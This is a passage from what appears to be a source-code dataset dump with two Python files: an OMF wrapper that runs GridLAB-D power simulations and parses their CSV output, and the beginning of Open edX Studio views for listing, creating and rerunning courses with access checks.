code stringlengths 3 1.05M | repo_name stringlengths 5 104 | path stringlengths 4 251 | language stringclasses 1 value | license stringclasses 15 values | size int64 3 1.05M |
|---|---|---|---|---|---|
''' Code for running Gridlab and getting results into pythonic data structures. '''
from __future__ import print_function
import sys, os, subprocess, platform, re, datetime, shutil, traceback, math, time, tempfile, json
from os.path import join as pJoin
from copy import deepcopy
# Locational variables so we don't have to rely on OMF being in the system path.
_myDir = os.path.dirname(os.path.abspath(__file__))
_omfDir = os.path.dirname(os.path.dirname(_myDir))
#sys.path.append(_omfDir)
# OMF imports.
import omf.feeder
def checkStatus(modelDir):
'''Reads a current gridlabD simulation time from stdErr.txt,
compares it to the total input simulation time and outputs a
percent complete as 'floatPercentageStatus'.
'''
# TODO: Work with all feeders; take average of all feeders
# currently gridlabD does 1 feeder at a time (1 stderr available at at time.)
# Resources decision: Can we afford to push each feeder to a separate process??
def getFloatPercentage(workDir, endDate, simLength, simLengthUnits):
try:
gridlabDTime = ''
with open(pJoin(workDir, 'stderr.txt'),'r') as stderrFile:
gridlabDTime = stderrFile.read().strip()
gridlabDTest = gridlabDTime.split('\r')
gridlabDTest = gridlabDTest[len(gridlabDTest)-1]
gridlabDTimeFormatted = gridlabDTest.split('Processing ')[1].split('PST...')[0].lstrip().rstrip()
gridlabDTimeFormatted = datetime.datetime.strptime(gridlabDTimeFormatted, '%Y-%m-%d %H:%M:%S')
print("\n gridlabDTime=", gridlabDTimeFormatted)
difference = (endDate - gridlabDTimeFormatted)
print("\n difference=", difference)
if simLengthUnits == 'hours':
floatPercentageStatus = -1*(difference.total_seconds()/3600)/(float(simLength)) + 1.0
elif simLengthUnits == 'days':
floatPercentageStatus = -1*(difference.total_seconds()/86400)/(float(simLength)) + 1.0
elif simLengthUnits == 'minutes':
floatPercentageStatus = -1*(difference.total_seconds()/60)/(float(simLength)) + 1.0
except:
print("\n No std error file, passing.")
floatPercentageStatus = 0.0
pass
return floatPercentageStatus
def checkstdOutExists(workDir):
try:
with open(pJoin(workDir, 'stdout.txt'),'r') as stdOutFile:
stdOutExists = stdOutFile.read().strip()
if stdOutExists != "":
return True
else:
return False
except:
return False
def convertSimLengthToEndDate(simStartDate, simLength, simLengthUnits):
startDate = datetime.datetime.strptime(simStartDate, '%Y-%m-%d')
if simLengthUnits == "hours":
endDate = startDate + datetime.timedelta(hours=float(simLength))
elif simLengthUnits == "":
endDate = startDate + datetime.timedelta(minutes=float(simLength))
elif simLengthUnits == "days":
endDate = startDate + datetime.timedelta(days=float(simLength))
return endDate
with open(pJoin(modelDir, "allInputData.json")) as f:
inputDict = json.load(f)
(simStartDate, simLength, simLengthUnits) = \
[inputDict[x] for x in ('simStartDate', 'simLength', 'simLengthUnits')]
startDate = datetime.datetime.strptime(simStartDate, '%Y-%m-%d')
endDate = convertSimLengthToEndDate(simStartDate, simLength, simLengthUnits)
print("\n Simulation startDate=", startDate, ", endDate=", endDate)
time.sleep(5) # It takes about 5 seconds to start
# Reads stdErr output every second, stdErr sometimes doesn't end on the final
# time, so if stdOut exists, the gridlabD simulation for the feeder is complete.
for key in sorted(inputDict, key=inputDict.get):
if key.startswith("feederName"):
feederDir, feederName = inputDict[key].split("___")
workDir = pJoin(modelDir, feederName)
print("\n Computing progress for first feeder:", feederName)
floatPercentageStatus = 0.0
while floatPercentageStatus < 1.0:
floatPercentageOld = floatPercentageStatus
floatPercentageStatus = getFloatPercentage(workDir, endDate, simLength, simLengthUnits)
if (floatPercentageOld == floatPercentageStatus) and (checkstdOutExists(workDir) == True):
print('\n The stdOut exists, so the gridlabD simulation is complete for feeder:', feederName)
floatPercentageStatus = 1.0
break
print("\n Current percent complete: ", floatPercentageStatus)
time.sleep(1)
def _addGldToPath():
''' Figure out what platform we're on and choose a suitable Gridlab binary.
Returns full path to binary as result. '''
enviro = os.environ
if sys.platform == 'win32' or sys.platform == 'cygwin':
if platform.machine().endswith('64'):
binary = _myDir + "\\win64\\gridlabd.exe"
enviro['GRIDLABD'] = _myDir + "\\win64"
enviro['GLPATH'] = _myDir + "\\win64\\"
else:
binary = _myDir + "\\win32\\gridlabd.exe"
enviro['GRIDLABD'] = _myDir + "\\win32"
enviro['GLPATH'] = _myDir + "\\win32\\"
return binary
elif sys.platform == 'darwin':
return _myDir + "/local_gd/bin/gridlabd"
elif sys.platform == 'linux2':
binary = _myDir + "/linx64/gridlabd.bin"
enviro['GRIDLABD'] = _myDir + "/linx64"
enviro['GLPATH'] = _myDir + "/linx64"
# Uncomment the following line if we ever get all the linux libraries bundled. Hard!
# enviro['LD_LIBRARY_PATH'] = enviro['LD_LIBRARY_PATH'] + ':' + solverRoot + "/linx64"
return binary
else:
# Platform not supported, so just return the standard binary and pray it works:
return "gridlabd"
def runInFilesystem(feederTree, attachments=[], keepFiles=False, workDir=None, glmName=None):
''' Execute gridlab in the local filesystem. Return a nice dictionary of results. '''
try:
binaryName = _myDir + "/local_gd/bin/gridlabd"
# Create a running directory and fill it, unless we've specified where we're running.
if not workDir:
workDir = tempfile.mkdtemp()
print("gridlabD runInFilesystem with no specified workDir. Working in", workDir)
# Need to zero out lat/lon data on copy because it frequently breaks Gridlab.
localTree = deepcopy(feederTree)
for key in list(localTree.keys()):
try:
del localTree[key]["latitude"]
del localTree[key]["longitude"]
except:
pass # No lat lons.
# Write attachments and glm.
for attach in attachments:
with open(pJoin(workDir,attach),'w') as attachFile:
attachFile.write(attachments[attach])
glmString = omf.feeder.sortedWrite(localTree)
if not glmName:
glmName = "main." + datetime.datetime.now().strftime('%Y-%m-%d-%H-%M-%S') + ".glm"
with open(pJoin(workDir, glmName),'w') as glmFile:
glmFile.write(glmString)
# RUN GRIDLABD IN FILESYSTEM (EXPENSIVE!)
with open(pJoin(workDir,'stdout.txt'),'w') as stdout, open(pJoin(workDir,'stderr.txt'),'w') as stderr, open(pJoin(workDir,'PID.txt'),'w') as pidFile:
# MAYBEFIX: turn standerr WARNINGS back on once we figure out how to supress the 500MB of lines gridlabd wants to write...
proc = subprocess.Popen([binaryName,'-w', glmName], cwd=workDir, stdout=stdout, stderr=stderr)
pidFile.write(str(proc.pid))
returnCode = proc.wait()
# Build raw JSON output.
rawOut = anaDataTree(workDir, lambda x:True)
with open(pJoin(workDir,'stderr.txt'),'r') as stderrFile:
rawOut['stderr'] = stderrFile.read().strip()
with open(pJoin(workDir,'stdout.txt'),'r') as stdoutFile:
rawOut['stdout'] = stdoutFile.read().strip()
# Delete the folder and return.
if not keepFiles and not workDir:
# NOTE: if we've specify a working directory, don't just blow it away.
for attempt in range(5):
try:
shutil.rmtree(workDir)
break
except WindowsError:
# HACK: if we don't sleep 1 second, windows intermittantly fails to delete things and an exception is thrown.
# Probably cus dropbox is monkeying around in these folders on my dev machine. Disabled for now since it works when dropbox is off.
time.sleep(2)
return rawOut
except:
with open(pJoin(workDir, "stderr.txt"), "a+") as stderrFile:
traceback.print_exc(file = stderrFile)
return {}
def _strClean(x):
''' Helper function that translates csv values to reasonable floats (or header values to strings). '''
if x == 'OPEN':
return 1.0
elif x == 'CLOSED':
return 0.0
# Look for strings of the type '+32.0+68.32d':
elif x == '-1.#IND':
return 0.0
if x.endswith('d'):
matches = re.findall('^([+-]?\d+\.?\d*e?[+-]?\d+)[+-](\d+\.?\d*e?[+-]?\d*)d$',x)
if len(matches)==0:
return 0.0
else:
floatConv = list(map(float, matches[0]))
squares = [x**2 for x in floatConv]
return math.sqrt(sum(squares))
elif re.findall('^([+-]?\d+\.?\d*e?[+-]?\d*)$',x) != []:
matches = re.findall('([+-]?\d+\.?\d*e?[+-]?\d*)',x)
if len(matches)==0:
return 0.0
else:
try: return float(matches[0])
except: return 0.0 # Hack for crazy WTF occasional Gridlab output.
else:
return x
def csvToArray(fileName):
''' Take a Gridlab-export csv filename, return a list of timeseries vectors.'''
with open(fileName) as openfile:
data = openfile.read()
lines = data.splitlines()
array = [x.split(',') for x in lines]
cleanArray = [list(map(_strClean, x)) for x in array]
# Magic number 8 is the number of header rows in each GridlabD csv.
arrayNoHeaders = cleanArray[8:]
# Drop the timestamp column:
return arrayNoHeaders
def _seriesTranspose(theArray):
''' Transpose every matrix that's a value in a dictionary. Yikes. '''
return {i[0]:list(i)[1:] for i in zip(*theArray)}
def anaDataTree(studyPath, fileNameTest):
''' Take a study and put all its data into a nested object {fileName:{metricName:[...]}} '''
data = {}
csvFiles = os.listdir(studyPath)
for cName in csvFiles:
if fileNameTest(cName) and cName.endswith('.csv'):
arr = csvToArray(studyPath + '/' + cName)
data[cName] = _seriesTranspose(arr)
return data
def _debug():
print("Full path to Gridlab executable we're using:", _addGldToPath())
print("Testing string cleaning.")
strTestCases = [("+954.877", 954.877),
("+2.18351e+006", 2183510.0),
("+7244.99+1.20333e-005d", 7244.99),
# ("+7244.99+120d", 7245.98372204), # Fails due to float rounding but should pass.
("+3.76184", 3.76184),
("1", 1.0),
("-32.4", -32.4),
("+7200+0d", 7200.0),
("+175020+003133", 0.0)]
for (string, result) in strTestCases:
assert _strClean(string) == result, "A _strClean operation failed on: " + string
# Get a test feeder and test climate.
print("Testing GridlabD solver.")
with open(pJoin(_omfDir,"static","publicFeeders","Simple Market System.omd"),"r") as feederFile:
feederJson = json.load(feederFile)
with open(pJoin(_omfDir,"data","Climate","AL-HUNTSVILLE.tmy2"),"r") as climateFile:
tmyStr = climateFile.read()
# Add climate in.
feederJson["attachments"]["climate.tmy2"] = tmyStr
testStudy = runInFilesystem(feederJson["tree"], feederJson["attachments"])
assert testStudy != {}, "Gridlab run failed and we got blank output."
print("GridlabD standard error:", testStudy['stderr'])
print("GridlabD standard output:", testStudy['stdout'])
if __name__ == '__main__':
_debug()
| dpinney/omf | omf/solvers/gridlabd_gridballast/__init__.py | Python | gpl-2.0 | 10,839 |
"""
Views related to operations on course objects
"""
import copy
from django.shortcuts import redirect
import json
import random
import logging
import string # pylint: disable=deprecated-module
from django.utils.translation import ugettext as _
import django.utils
from django.contrib.auth.decorators import login_required
from django.conf import settings
from django.views.decorators.http import require_http_methods, require_GET
from django.core.exceptions import PermissionDenied
from django.core.urlresolvers import reverse
from django.http import HttpResponseBadRequest, HttpResponseNotFound, HttpResponse, Http404
from util.json_request import JsonResponse, JsonResponseBadRequest
from util.date_utils import get_default_time_display
from edxmako.shortcuts import render_to_response
from xmodule.course_module import DEFAULT_START_DATE
from xmodule.error_module import ErrorDescriptor
from xmodule.modulestore.django import modulestore
from xmodule.contentstore.content import StaticContent
from xmodule.tabs import CourseTab, CourseTabList, InvalidTabsException
from openedx.core.lib.course_tabs import CourseTabPluginManager
from openedx.core.djangoapps.credit.api import is_credit_course, get_credit_requirements
from openedx.core.djangoapps.credit.tasks import update_credit_course_requirements
from openedx.core.djangoapps.content.course_structures.api.v0 import api, errors
from openedx.core.djangoapps.self_paced.models import SelfPacedConfiguration
from xmodule.modulestore import EdxJSONEncoder
from xmodule.modulestore.exceptions import ItemNotFoundError, DuplicateCourseError
from opaque_keys import InvalidKeyError
from opaque_keys.edx.locations import Location
from opaque_keys.edx.keys import CourseKey
from django.views.decorators.csrf import ensure_csrf_cookie
from openedx.core.lib.js_utils import escape_json_dumps
from contentstore.course_info_model import get_course_updates, update_course_updates, delete_course_update
from contentstore.course_group_config import (
GroupConfiguration,
GroupConfigurationsValidationError,
RANDOM_SCHEME,
COHORT_SCHEME
)
from contentstore.courseware_index import CoursewareSearchIndexer, SearchIndexingError
from contentstore.utils import (
add_instructor,
initialize_permissions,
get_lms_link_for_item,
reverse_course_url,
reverse_library_url,
reverse_usage_url,
reverse_url,
remove_all_instructors,
)
from models.settings.course_details import CourseDetails, CourseSettingsEncoder
from models.settings.course_grading import CourseGradingModel
from models.settings.course_metadata import CourseMetadata
from util.json_request import expect_json
from util.string_utils import _has_non_ascii_characters
from student.auth import has_studio_write_access, has_studio_read_access
from .component import (
SPLIT_TEST_COMPONENT_TYPE,
ADVANCED_COMPONENT_TYPES,
)
from contentstore.tasks import rerun_course
from contentstore.views.entrance_exam import (
create_entrance_exam,
update_entrance_exam,
delete_entrance_exam
)
from .library import LIBRARIES_ENABLED
from .item import create_xblock_info
from contentstore.push_notification import push_notification_enabled
from course_creators.views import get_course_creator_status, add_user_with_status_unrequested
from contentstore import utils
from student.roles import (
CourseInstructorRole, CourseStaffRole, CourseCreatorRole, GlobalStaff, UserBasedRole
)
from student import auth
from course_action_state.models import CourseRerunState, CourseRerunUIStateManager
from course_action_state.managers import CourseActionStateItemNotFoundError
from microsite_configuration import microsite
from xmodule.course_module import CourseFields
from student.auth import has_course_author_access
from util.milestones_helpers import (
set_prerequisite_courses,
is_valid_course_key,
is_prerequisite_courses_enabled,
is_entrance_exams_enabled
)
log = logging.getLogger(__name__)
__all__ = ['course_info_handler', 'course_handler', 'course_listing',
'course_info_update_handler', 'course_search_index_handler',
'course_rerun_handler',
'settings_handler',
'grading_handler',
'advanced_settings_handler',
'course_notifications_handler',
'textbooks_list_handler', 'textbooks_detail_handler',
'group_configurations_list_handler', 'group_configurations_detail_handler']
class AccessListFallback(Exception):
"""
An exception that is raised whenever we need to `fall back` to fetching *all* courses
available to a user, rather than using a shorter method (i.e. fetching by group)
"""
pass
def get_course_and_check_access(course_key, user, depth=0):
"""
Internal method used to calculate and return the locator and course module
for the view functions in this file.
"""
if not has_studio_read_access(user, course_key):
raise PermissionDenied()
course_module = modulestore().get_course(course_key, depth=depth)
return course_module
def reindex_course_and_check_access(course_key, user):
"""
Internal method used to restart indexing on a course.
"""
if not has_course_author_access(user, course_key):
raise PermissionDenied()
return CoursewareSearchIndexer.do_course_reindex(modulestore(), course_key)
@login_required
def course_notifications_handler(request, course_key_string=None, action_state_id=None):
"""
Handle incoming requests for notifications in a RESTful way.
course_key_string and action_state_id must both be set; else a HttpBadResponseRequest is returned.
For each of these operations, the requesting user must have access to the course;
else a PermissionDenied error is returned.
GET
json: return json representing information about the notification (action, state, etc)
DELETE
json: return json repressing success or failure of dismissal/deletion of the notification
PUT
Raises a NotImplementedError.
POST
Raises a NotImplementedError.
"""
# ensure that we have a course and an action state
if not course_key_string or not action_state_id:
return HttpResponseBadRequest()
response_format = request.REQUEST.get('format', 'html')
course_key = CourseKey.from_string(course_key_string)
if response_format == 'json' or 'application/json' in request.META.get('HTTP_ACCEPT', 'application/json'):
if not has_studio_write_access(request.user, course_key):
raise PermissionDenied()
if request.method == 'GET':
return _course_notifications_json_get(action_state_id)
elif request.method == 'DELETE':
# we assume any delete requests dismiss actions from the UI
return _dismiss_notification(request, action_state_id)
elif request.method == 'PUT':
raise NotImplementedError()
elif request.method == 'POST':
raise NotImplementedError()
else:
return HttpResponseBadRequest()
else:
return HttpResponseNotFound()
def _course_notifications_json_get(course_action_state_id):
"""
Return the action and the action state for the given id
"""
try:
action_state = CourseRerunState.objects.find_first(id=course_action_state_id)
except CourseActionStateItemNotFoundError:
return HttpResponseBadRequest()
action_state_info = {
'action': action_state.action,
'state': action_state.state,
'should_display': action_state.should_display
}
return JsonResponse(action_state_info)
def _dismiss_notification(request, course_action_state_id): # pylint: disable=unused-argument
"""
Update the display of the course notification
"""
try:
action_state = CourseRerunState.objects.find_first(id=course_action_state_id)
except CourseActionStateItemNotFoundError:
# Can't dismiss a notification that doesn't exist in the first place
return HttpResponseBadRequest()
if action_state.state == CourseRerunUIStateManager.State.FAILED:
# We remove all permissions for this course key at this time, since
# no further access is required to a course that failed to be created.
remove_all_instructors(action_state.course_key)
# The CourseRerunState is no longer needed by the UI; delete
action_state.delete()
return JsonResponse({'success': True})
# pylint: disable=unused-argument
@login_required
def course_handler(request, course_key_string=None):
"""
The restful handler for course specific requests.
It provides the course tree with the necessary information for identifying and labeling the parts. The root
will typically be a 'course' object but may not be especially as we support modules.
GET
html: return course listing page if not given a course id
html: return html page overview for the given course if given a course id
json: return json representing the course branch's index entry as well as dag w/ all of the children
replaced w/ json docs where each doc has {'_id': , 'display_name': , 'children': }
POST
json: create a course, return resulting json
descriptor (same as in GET course/...). Leaving off /branch/draft would imply create the course w/ default
branches. Cannot change the structure contents ('_id', 'display_name', 'children') but can change the
index entry.
PUT
json: update this course (index entry not xblock) such as repointing head, changing display name, org,
course, run. Return same json as above.
DELETE
json: delete this branch from this course (leaving off /branch/draft would imply delete the course)
"""
try:
response_format = request.REQUEST.get('format', 'html')
if response_format == 'json' or 'application/json' in request.META.get('HTTP_ACCEPT', 'application/json'):
if request.method == 'GET':
course_key = CourseKey.from_string(course_key_string)
with modulestore().bulk_operations(course_key):
course_module = get_course_and_check_access(course_key, request.user, depth=None)
return JsonResponse(_course_outline_json(request, course_module))
elif request.method == 'POST': # not sure if this is only post. If one will have ids, it goes after access
return _create_or_rerun_course(request)
elif not has_studio_write_access(request.user, CourseKey.from_string(course_key_string)):
raise PermissionDenied()
elif request.method == 'PUT':
raise NotImplementedError()
elif request.method == 'DELETE':
raise NotImplementedError()
else:
return HttpResponseBadRequest()
elif request.method == 'GET': # assume html
if course_key_string is None:
return redirect(reverse("home"))
else:
return course_index(request, CourseKey.from_string(course_key_string))
else:
return HttpResponseNotFound()
except InvalidKeyError:
raise Http404
@login_required
@ensure_csrf_cookie
@require_http_methods(["GET"])
def course_rerun_handler(request, course_key_string):
"""
The restful handler for course reruns.
GET
html: return html page with form to rerun a course for the given course id
"""
# Only global staff (PMs) are able to rerun courses during the soft launch
if not GlobalStaff().has_user(request.user):
raise PermissionDenied()
course_key = CourseKey.from_string(course_key_string)
with modulestore().bulk_operations(course_key):
course_module = get_course_and_check_access(course_key, request.user, depth=3)
if request.method == 'GET':
return render_to_response('course-create-rerun.html', {
'source_course_key': course_key,
'display_name': course_module.display_name,
'user': request.user,
'course_creator_status': _get_course_creator_status(request.user),
'allow_unicode_course_id': settings.FEATURES.get('ALLOW_UNICODE_COURSE_ID', False)
})
@login_required
@ensure_csrf_cookie
@require_GET
def course_search_index_handler(request, course_key_string):
"""
The restful handler for course indexing.
GET
html: return status of indexing task
json: return status of indexing task
"""
# Only global staff (PMs) are able to index courses
if not GlobalStaff().has_user(request.user):
raise PermissionDenied()
course_key = CourseKey.from_string(course_key_string)
content_type = request.META.get('CONTENT_TYPE', None)
if content_type is None:
content_type = "application/json; charset=utf-8"
with modulestore().bulk_operations(course_key):
try:
reindex_course_and_check_access(course_key, request.user)
except SearchIndexingError as search_err:
return HttpResponse(escape_json_dumps({
"user_message": search_err.error_list
}), content_type=content_type, status=500)
return HttpResponse(escape_json_dumps({
"user_message": _("Course has been successfully reindexed.")
}), content_type=content_type, status=200)
def _course_outline_json(request, course_module):
"""
Returns a JSON representation of the course module and recursively all of its children.
"""
return create_xblock_info(
course_module,
include_child_info=True,
course_outline=True,
include_children_predicate=lambda xblock: not xblock.category == 'vertical',
user=request.user
)
def _accessible_courses_list(request):
"""
List all courses available to the logged in user by iterating through all the courses
"""
def course_filter(course):
"""
Filter out unusable and inaccessible courses
"""
if isinstance(course, ErrorDescriptor):
return False
# pylint: disable=fixme
# TODO remove this condition when templates purged from db
if course.location.course == 'templates':
return False
return has_studio_read_access(request.user, course.id)
courses = filter(course_filter, modulestore().get_courses())
in_process_course_actions = [
course for course in
CourseRerunState.objects.find_all(
exclude_args={'state': CourseRerunUIStateManager.State.SUCCEEDED}, should_display=True
)
if has_studio_read_access(request.user, course.course_key)
]
return courses, in_process_course_actions
def _accessible_courses_list_from_groups(request):
"""
List all courses available to the logged in user by reversing access group names
"""
courses_list = {}
in_process_course_actions = []
instructor_courses = UserBasedRole(request.user, CourseInstructorRole.ROLE).courses_with_role()
staff_courses = UserBasedRole(request.user, CourseStaffRole.ROLE).courses_with_role()
all_courses = instructor_courses | staff_courses
for course_access in all_courses:
course_key = course_access.course_id
if course_key is None:
# If the course_access does not have a course_id, it's an org-based role, so we fall back
raise AccessListFallback
if course_key not in courses_list:
# check for any course action state for this course
in_process_course_actions.extend(
CourseRerunState.objects.find_all(
exclude_args={'state': CourseRerunUIStateManager.State.SUCCEEDED},
should_display=True,
course_key=course_key,
)
)
# check for the course itself
try:
course = modulestore().get_course(course_key)
except ItemNotFoundError:
# If a user has access to a course that doesn't exist, don't do anything with that course
pass
if course is not None and not isinstance(course, ErrorDescriptor):
# ignore deleted or errored courses
courses_list[course_key] = course
return courses_list.values(), in_process_course_actions
def _accessible_libraries_list(user):
"""
List all libraries available to the logged in user by iterating through all libraries
"""
# No need to worry about ErrorDescriptors - split's get_libraries() never returns them.
return [lib for lib in modulestore().get_libraries() if has_studio_read_access(user, lib.location.library_key)]
@login_required
@ensure_csrf_cookie
def course_listing(request):
"""
List all courses available to the logged in user
"""
courses, in_process_course_actions = get_courses_accessible_to_user(request)
libraries = _accessible_libraries_list(request.user) if LIBRARIES_ENABLED else []
def format_in_process_course_view(uca):
"""
Return a dict of the data which the view requires for each unsucceeded course
"""
return {
'display_name': uca.display_name,
'course_key': unicode(uca.course_key),
'org': uca.course_key.org,
'number': uca.course_key.course,
'run': uca.course_key.run,
'is_failed': True if uca.state == CourseRerunUIStateManager.State.FAILED else False,
'is_in_progress': True if uca.state == CourseRerunUIStateManager.State.IN_PROGRESS else False,
'dismiss_link': reverse_course_url(
'course_notifications_handler',
uca.course_key,
kwargs={
'action_state_id': uca.id,
},
) if uca.state == CourseRerunUIStateManager.State.FAILED else ''
}
def format_library_for_view(library):
"""
Return a dict of the data which the view requires for each library
"""
return {
'display_name': library.display_name,
'library_key': unicode(library.location.library_key),
'url': reverse_library_url('library_handler', unicode(library.location.library_key)),
'org': library.display_org_with_default,
'number': library.display_number_with_default,
'can_edit': has_studio_write_access(request.user, library.location.library_key),
}
courses = _remove_in_process_courses(courses, in_process_course_actions)
in_process_course_actions = [format_in_process_course_view(uca) for uca in in_process_course_actions]
return render_to_response('index.html', {
'courses': courses,
'in_process_course_actions': in_process_course_actions,
'libraries_enabled': LIBRARIES_ENABLED,
'libraries': [format_library_for_view(lib) for lib in libraries],
'show_new_library_button': LIBRARIES_ENABLED and request.user.is_active,
'user': request.user,
'request_course_creator_url': reverse('contentstore.views.request_course_creator'),
'course_creator_status': _get_course_creator_status(request.user),
'rerun_creator_status': GlobalStaff().has_user(request.user),
'allow_unicode_course_id': settings.FEATURES.get('ALLOW_UNICODE_COURSE_ID', False),
'allow_course_reruns': settings.FEATURES.get('ALLOW_COURSE_RERUNS', True)
})
def _get_rerun_link_for_item(course_key):
""" Returns the rerun link for the given course key. """
return reverse_course_url('course_rerun_handler', course_key)
def _deprecated_blocks_info(course_module, deprecated_block_types):
"""
Returns deprecation information about `deprecated_block_types`
Arguments:
course_module (CourseDescriptor): course object
deprecated_block_types (list): list of deprecated blocks types
Returns:
Dict with following keys:
block_types (list): list containing types of all deprecated blocks
block_types_enabled (bool): True if any or all `deprecated_blocks` present in Advanced Module List else False
blocks (list): List of `deprecated_block_types` component names and their parent's url
advance_settings_url (str): URL to advance settings page
"""
data = {
'block_types': deprecated_block_types,
'block_types_enabled': any(
block_type in course_module.advanced_modules for block_type in deprecated_block_types
),
'blocks': [],
'advance_settings_url': reverse_course_url('advanced_settings_handler', course_module.id)
}
try:
structure_data = api.course_structure(course_module.id, block_types=deprecated_block_types)
except errors.CourseStructureNotAvailableError:
return data
blocks = []
for block in structure_data['blocks'].values():
blocks.append([reverse_usage_url('container_handler', block['parent']), block['display_name']])
data['blocks'].extend(blocks)
return data
@login_required
@ensure_csrf_cookie
def course_index(request, course_key):
"""
Display an editable course overview.
org, course, name: Attributes of the Location for the item to edit
"""
# A depth of None implies the whole course. The course outline needs this in order to compute has_changes.
# A unit may not have a draft version, but one of its components could, and hence the unit itself has changes.
with modulestore().bulk_operations(course_key):
course_module = get_course_and_check_access(course_key, request.user, depth=None)
if not course_module:
raise Http404
lms_link = get_lms_link_for_item(course_module.location)
reindex_link = None
if settings.FEATURES.get('ENABLE_COURSEWARE_INDEX', False):
reindex_link = "/course/{course_id}/search_reindex".format(course_id=unicode(course_key))
sections = course_module.get_children()
course_structure = _course_outline_json(request, course_module)
locator_to_show = request.REQUEST.get('show', None)
course_release_date = get_default_time_display(course_module.start) if course_module.start != DEFAULT_START_DATE else _("Unscheduled")
settings_url = reverse_course_url('settings_handler', course_key)
try:
current_action = CourseRerunState.objects.find_first(course_key=course_key, should_display=True)
except (ItemNotFoundError, CourseActionStateItemNotFoundError):
current_action = None
deprecated_blocks_info = _deprecated_blocks_info(course_module, settings.DEPRECATED_BLOCK_TYPES)
return render_to_response('course_outline.html', {
'context_course': course_module,
'lms_link': lms_link,
'sections': sections,
'course_structure': course_structure,
'initial_state': course_outline_initial_state(locator_to_show, course_structure) if locator_to_show else None,
'rerun_notification_id': current_action.id if current_action else None,
'course_release_date': course_release_date,
'settings_url': settings_url,
'reindex_link': reindex_link,
'deprecated_blocks_info': deprecated_blocks_info,
'notification_dismiss_url': reverse_course_url(
'course_notifications_handler',
current_action.course_key,
kwargs={
'action_state_id': current_action.id,
},
) if current_action else None,
})
def get_courses_accessible_to_user(request):
"""
Try to get all courses by first reversing django groups and fallback to old method if it fails
Note: overhead of pymongo reads will increase if getting courses from django groups fails
"""
if GlobalStaff().has_user(request.user):
# user has global access so no need to get courses from django groups
courses, in_process_course_actions = _accessible_courses_list(request)
else:
try:
courses, in_process_course_actions = _accessible_courses_list_from_groups(request)
except AccessListFallback:
# user have some old groups or there was some error getting courses from django groups
# so fallback to iterating through all courses
courses, in_process_course_actions = _accessible_courses_list(request)
return courses, in_process_course_actions
def _remove_in_process_courses(courses, in_process_course_actions):
"""
removes any in-process courses in courses list. in-process actually refers to courses
that are in the process of being generated for re-run
"""
def format_course_for_view(course):
"""
Return a dict of the data which the view requires for each course
"""
return {
'display_name': course.display_name,
'course_key': unicode(course.location.course_key),
'url': reverse_course_url('course_handler', course.id),
'lms_link': get_lms_link_for_item(course.location),
'rerun_link': _get_rerun_link_for_item(course.id),
'org': course.display_org_with_default,
'number': course.display_number_with_default,
'run': course.location.run
}
in_process_action_course_keys = [uca.course_key for uca in in_process_course_actions]
courses = [
format_course_for_view(c)
for c in courses
if not isinstance(c, ErrorDescriptor) and (c.id not in in_process_action_course_keys)
]
return courses
def course_outline_initial_state(locator_to_show, course_structure):
"""
Returns the desired initial state for the course outline view. If the 'show' request parameter
was provided, then the view's initial state will be to have the desired item fully expanded
and to scroll to see the new item.
"""
def find_xblock_info(xblock_info, locator):
"""
Finds the xblock info for the specified locator.
"""
if xblock_info['id'] == locator:
return xblock_info
children = xblock_info['child_info']['children'] if xblock_info.get('child_info', None) else None
if children:
for child_xblock_info in children:
result = find_xblock_info(child_xblock_info, locator)
if result:
return result
return None
def collect_all_locators(locators, xblock_info):
"""
Collect all the locators for an xblock and its children.
"""
locators.append(xblock_info['id'])
children = xblock_info['child_info']['children'] if xblock_info.get('child_info', None) else None
if children:
for child_xblock_info in children:
collect_all_locators(locators, child_xblock_info)
selected_xblock_info = find_xblock_info(course_structure, locator_to_show)
if not selected_xblock_info:
return None
expanded_locators = []
collect_all_locators(expanded_locators, selected_xblock_info)
return {
'locator_to_show': locator_to_show,
'expanded_locators': expanded_locators
}
@expect_json
def _create_or_rerun_course(request):
"""
To be called by requests that create a new destination course (i.e., create_new_course and rerun_course)
Returns the destination course_key and overriding fields for the new course.
Raises DuplicateCourseError and InvalidKeyError
"""
if not auth.user_has_role(request.user, CourseCreatorRole()):
raise PermissionDenied()
try:
org = request.json.get('org')
course = request.json.get('number', request.json.get('course'))
display_name = request.json.get('display_name')
# force the start date for reruns and allow us to override start via the client
start = request.json.get('start', CourseFields.start.default)
run = request.json.get('run')
# allow/disable unicode characters in course_id according to settings
if not settings.FEATURES.get('ALLOW_UNICODE_COURSE_ID'):
if _has_non_ascii_characters(org) or _has_non_ascii_characters(course) or _has_non_ascii_characters(run):
return JsonResponse(
{'error': _('Special characters not allowed in organization, course number, and course run.')},
status=400
)
fields = {'start': start}
if display_name is not None:
fields['display_name'] = display_name
# Set a unique wiki_slug for newly created courses. To maintain active wiki_slugs for
# existing xml courses this cannot be changed in CourseDescriptor.
# # TODO get rid of defining wiki slug in this org/course/run specific way and reconcile
# w/ xmodule.course_module.CourseDescriptor.__init__
wiki_slug = u"{0}.{1}.{2}".format(org, course, run)
definition_data = {'wiki_slug': wiki_slug}
fields.update(definition_data)
if 'source_course_key' in request.json:
return _rerun_course(request, org, course, run, fields)
else:
return _create_new_course(request, org, course, run, fields)
except DuplicateCourseError:
return JsonResponse({
'ErrMsg': _(
'There is already a course defined with the same '
'organization and course number. Please '
'change either organization or course number to be unique.'
),
'OrgErrMsg': _(
'Please change either the organization or '
'course number so that it is unique.'),
'CourseErrMsg': _(
'Please change either the organization or '
'course number so that it is unique.'),
})
except InvalidKeyError as error:
return JsonResponse({
"ErrMsg": _("Unable to create course '{name}'.\n\n{err}").format(name=display_name, err=error.message)}
)
def _create_new_course(request, org, number, run, fields):
"""
Create a new course.
Returns the URL for the course overview page.
Raises DuplicateCourseError if the course already exists
"""
store_for_new_course = modulestore().default_modulestore.get_modulestore_type()
new_course = create_new_course_in_store(store_for_new_course, request.user, org, number, run, fields)
return JsonResponse({
'url': reverse_course_url('course_handler', new_course.id),
'course_key': unicode(new_course.id),
})
def create_new_course_in_store(store, user, org, number, run, fields):
"""
Create course in store w/ handling instructor enrollment, permissions, and defaulting the wiki slug.
Separated out b/c command line course creation uses this as well as the web interface.
"""
# Set default language from settings and enable web certs
fields.update({
'language': getattr(settings, 'DEFAULT_COURSE_LANGUAGE', 'en'),
'cert_html_view_enabled': True,
})
with modulestore().default_store(store):
# Creating the course raises DuplicateCourseError if an existing course with this org/name is found
new_course = modulestore().create_course(
org,
number,
run,
user.id,
fields=fields,
)
# Make sure user has instructor and staff access to the new course
add_instructor(new_course.id, user, user)
# Initialize permissions for user in the new course
initialize_permissions(new_course.id, user)
return new_course
